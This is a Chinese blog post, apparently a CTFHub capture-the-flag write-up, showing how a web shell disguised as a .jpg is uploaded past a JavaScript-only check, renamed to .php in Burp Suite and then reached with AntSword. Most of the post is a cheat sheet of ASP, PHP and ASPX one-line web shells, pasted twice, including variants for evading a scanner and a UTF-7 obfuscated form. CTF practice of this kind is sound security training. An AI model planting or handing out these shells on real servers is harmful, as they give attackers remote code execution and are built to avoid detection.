CTFHub题解

最新推荐文章于 2024-04-07 16:45:20 发布
最新推荐文章于 2024-04-07 16:45:20 发布
阅读量212 收藏
点赞数
分类专栏: 题解 一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52676257/article/details/114596344
版权

CTFHub题解
文件上传 js前端验证
查看该页面源代码,发现该页面允许上传的文件类型为.jpg,.png,.gif
在这里插入图片描述于是上传一句话木马yjh.jpg,使用Burp Suite进行抓包后,将所上传文件后缀名改为.php,再进行放包
在这里插入图片描述
连接中国蚁剑,进行添加数据,就得到了flag
在这里插入图片描述相关知识点
常见一句话木马
常用一句话木马

asp一句话木马:
<%execute(request(“value”))%>

php一句话木马:

<?php @eval($_POST["value"]);?>

aspx一句话木马:
<%@ Page Language=“Jscript”%>

<%eval(Request.Item[“value”])%>

其他一句话木马:

<%eval request(“value”)%>

<%execute request(“value”)%>

<%execute(request(“value”))%>

<%If Request(“value”)<>"" Then Execute(Request(“value”))%>

<%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>

<%@ Page Language=“Jscript”%>

<%eval(Request.Item[“value”],“unsafe”);%>

可以躲过雷客图的一句话木马:

<%

set ms = server.CreateObject(“MSScriptControl.ScriptControl.1”)

ms.Language=“VBScript”

ms.AddObject “Response”, Response

ms.AddObject “request”, request

ms.ExecuteStatement(“ev”&“al(request(”“value”"))")

%>

不用’<,>'的asp一句话木马:

不用双引号的一句话木马:

<%eval request(chr(35))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset="936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>常用一句话木马

asp一句话木马:
<%execute(request(“value”))%>

php一句话木马:

<?php @eval($_POST["value"]);?>

aspx一句话木马:
<%@ Page Language=“Jscript”%>

<%eval(Request.Item[“value”])%>

其他一句话木马:

<%eval request(“value”)%>

<%execute request(“value”)%>

<%execute(request(“value”))%>

<%If Request(“value”)<>"" Then Execute(Request(“value”))%>

<%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>

<%@ Page Language=“Jscript”%>

<%eval(Request.Item[“value”],“unsafe”);%>

可以躲过雷客图的一句话木马:

<%

set ms = server.CreateObject(“MSScriptControl.ScriptControl.1”)

ms.Language=“VBScript”

ms.AddObject “Response”, Response

ms.AddObject “request”, request

ms.ExecuteStatement(“ev”&“al(request(”“value”"))")

%>

不用’<,>'的asp一句话木马:

不用双引号的一句话木马:

<%eval request(chr(35))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset="936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

��阿兮��
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf解题---听会歌吧
qq_36791003的博客
08-07 3137
题目 为了让大家更轻松的比赛,为大家准备了两首歌让大家下载 解题链接: http://ctf5.shiyanbar.com/down/ 解题 打开解题链接 查看源码 打开网页 http://ctf5.shiyanbar.com/down/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM= 下载文件后用记事本打开,发现乱码 对down...
漏洞扫描 CTF
m0_68249386的博客
04-29 407
目录 文章目录目录一、基础知识1.CTF简介2.竞赛模式3.比赛形式4.题目类型二、web 信息泄露1.目录遍历2.PHPINFO3.备份文件下载3.1 网站源码3.2 bak文件3.3 vim缓存3.4 .DS_Store 一、基础知识 1.CTF简介 步骤 1.登录CTFHub—>技能树---->基础知识 2.CTF简介---->开启题目---->题目附件---->复制FLAG粘贴---->提交 2.竞赛模式 步骤 1.竞赛模式---->开启题目---
个人的BUUCTF_Re之旅 SimpleRev_wp
weixin_62586193的博客
12-15 1150
把文件下载,用010 Editor打开,看到: 自然就知道这是个elf文件,而且是64位的,拖进ida看看: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char v4; // [rsp+Fh] [rbp-1h] while ( 1 ) { while ( 1 ) { printf("Welcome to C..
CTFHUB-web-信息泄漏(1),2024年哔哩哔哩网络安全高级面试题及答案
m0_61330875的博客
04-07 244
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 772
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHUB学习题解Web(1)- 前置技能(持续更新整理)
独沐晨霖
07-21 2025
注: 1. 因为是个入门题网站,若题目仅涉及简单的基础知识,就不截图了,仅简要说明过程 2. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 3. 大标题为版块名,小标题为含有题目的上级菜单名,无序黑体为题目名 Web HTTP协议 请求方式 众所周知,HTTP的请求方法是可以自定义的,用burp抓个包改一下请求方式为题目要求的CTFHUB就可以了 302重定向 打开网页用F12发现请求会被302重定向回index.html,用burp拦截并send to repeater即可得到fla
西普WEB大部分题解
12-09
西普WEB大部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
PAT甲级所有题解代码
02-03
这里包含了179道PAT甲级的代码AC题解,供有需要通过PAT考试的同学下载学习使用。
洛谷CF1458B题解
02-05
有关CF1458B的题解
snail codewar题解
02-19
snail codewar题解
蓝桥杯 蓝桥杯竞赛练习题的题解
最新发布
05-23
**内容概要**:本资源提供了蓝桥杯竞赛练习题的详细题解,涵盖了不同难度和类型的题目,包括基础算法、数据结构、数学建模、动态规划、图论、字符串处理等。每道题解都包括题目描述、思路解析、代码实现和运行结果。...
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTFHUB-WEB题目
Zxy_space的博客
10-13 330
CTFHub - 注入 1. 字符型注入 2. 报错注入 一、updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称。 第二个参数:XPath_string (Xpath格式的字符串) 。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值。 由于updatexml的第二个参数需要Xpath格式的字
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 4389
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTF-Hub ctfhub-web前置技能-HTTP http协议详细解答
wrypot的博客
03-31 213
就是我们刚刚输入的账号admin,密码123,中间多了一个冒号隔开,发送给intruder。同理,也是要添加编码,但是负载2就不用添加后缀了,最后勾选下方url编码这些字符。这题是贪吃蛇,我还在脑抽了去抓包,最后打开源码一看,直接无语好吧,再见。base64解码后密码是jordan,账号就是admin。开启代理,点击Give me Flag 然后抓包。选择集束炸弹,有效载荷1添加admin,载荷集2,导入刚刚下载的密码本。抓个包,base64解码看看。抓个包,admin改为1。补全CTFHUB试试。
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2075
数据库注入
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2055
ssrf
CTFHub HTTP协议前三题解
qq_63575829的博客
03-31 794
请求方式 提示HTTP请求方式为GET,若改为CTFHUB将得到flag 使用burp抓包,将GET改为CTFHUB,go后得到flag 302跳转 打开题目,提示HTTP临时重定向(指的是服务器无法处理发送的请求于是跳转到了一个可以处理请求的url上,而过程不会有任何提示,使用户无法分辨是否进行了重定向) 访问网页发现give me flag的链接,点击后不会有任何反应,怀疑此环节重定向了 使用burp抓包,使用repeater重新请求,得到flag cookie ..
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值